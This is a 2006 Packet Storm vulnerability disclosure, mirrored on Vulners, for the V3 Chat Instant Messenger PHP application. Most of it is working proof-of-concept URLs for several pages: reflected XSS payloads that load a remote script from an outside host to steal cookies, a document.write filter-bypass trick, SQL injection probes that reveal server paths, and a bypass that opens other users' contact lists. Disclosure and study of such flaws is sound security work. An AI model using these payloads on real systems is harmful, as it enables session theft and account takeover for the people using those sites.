Lucene search
K

v3chatIM.txt

🗓️ 26 Jun 2006 00:00:00Reported by LunyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

V3 Chat Instant Messenger mail and member profile XSS and SQL injection vulnerabilitie

Code
`V3 Chat Instant Messenger  
  
http://www.v3chat.com/  
  
Affected files:  
  
/mail/index.php  
/mail/reply.php  
is_online.php  
online.php  
profile.php  
profileview.php  
search.php  
mycontacts.php  
expire.php  
  
* Editing your profile:  
  
- input boxes  
  
------------------------------------------  
  
Mail Vulnerabilities:  
  
Full path disclosure via SQL injection on id when reading mail:  
  
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1'  
  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/v3chat/mail/index.php on line 17  
  
XSS vuln with cookie disclosure:  
  
We can bypass V3chats filters by using malformed img tags around out script tags. PoC:  
  
http://www.example.com/v3chat/mail/index.php?action=read&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
Replying to mail XSS vulns:  
  
http://www.example.com/v3chat/mail/reply.php?&recipientname=Scorpio&mid=62&id=1<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
---------------------------------------  
  
Members online XSS vulns with cookie disclosure:  
  
http://www.example.com/v3chat/members/is_online.php?membername=demo&action=update&login_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
  
Same as above, on online.php:  
  
http://www.example.com/messenger/online.php?action=update&membername=luny666&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></  
  
SCRIPT>">  
  
Adding members via Online.php Mysql error & full path disclosure:  
  
http://www.example.com/messenger/online.php?action=update&membername='  
  
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /content/username/v/#/domain/web/messenger/online.php on line 5  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Online', 'Jun 17, 2006 - 9:55 pm', '1150577732', '')' at line 1  
  
-------------------------------------  
  
Search.php XSS vuln:  
  
http://www.example.com/messenger/search.php?action=update&membername=&action=search&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
  
Adding a member from search.php XSS vuln:  
  
http://www.example.com/messenger/search.php?membername=luny666&memberid=287&contact_id=1&contact_name=<IMG%20SRC=javascript:alert(document.cookie)>&site_id=&add=1&s=1&r=0&min_age=16&max_age=100&location=&gender1=&gender2=  
--------------------------------------  
  
Same as above, this time on profile.php:  
  
http://www.example.com/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
-----------------------------------  
  
Same as above, on Profileview.php now:  
  
http://www.example.com/messenger/profileview.php?membername=demo<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
----------------------------------  
  
XSS vuln with cookie disclosure when editing profile:  
  
To bypass V3 chats filters we can use this XSS example. Credits to RSnake.Script tags wrapped around a document.write function that writes part of our second   
  
script tag.  
  
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://youfucktard.com/xss.js"></SCRIPT>  
  
-------------------------------  
  
Mycontacts.php XSS vulns with user bypass.  
  
It seems after you log in as a user youre able to put in any username in membername= and it will navigate you to their buddylist. From there you can add,   
  
remove, chat with, etc people on their buddylist. etc.  
  
PoC:  
http://example.com/messenger/mycontacts.php?membername=putausername  
  
-------------------------------  
  
Expire.php XSS vuln:  
  
http://example.com/messenger/expire.php?cust_name=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>">  
  
-----------------------------  
  
Screenshots:  
http://www.youfucktard.com/xsp/v3chat1.jpg  
http://www.youfucktard.com/xsp/v3chat2.jpg  
http://www.youfucktard.com/xsp/v3chat3.jpg  
http://www.youfucktard.com/xsp/v3chat4.jpg  
http://www.youfucktard.com/xsp/v3chat5.jpg  
http://www.youfucktard.com/xsp/v3chat6.jpg  
http://www.youfucktard.com/xsp/v3chat7.jpg  
http://www.youfucktard.com/xsp/v3chat8.jpg  
http://www.youfucktard.com/xsp/v3chat9.jpg  
http://www.youfucktard.com/xsp/v3chat10.jpg  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation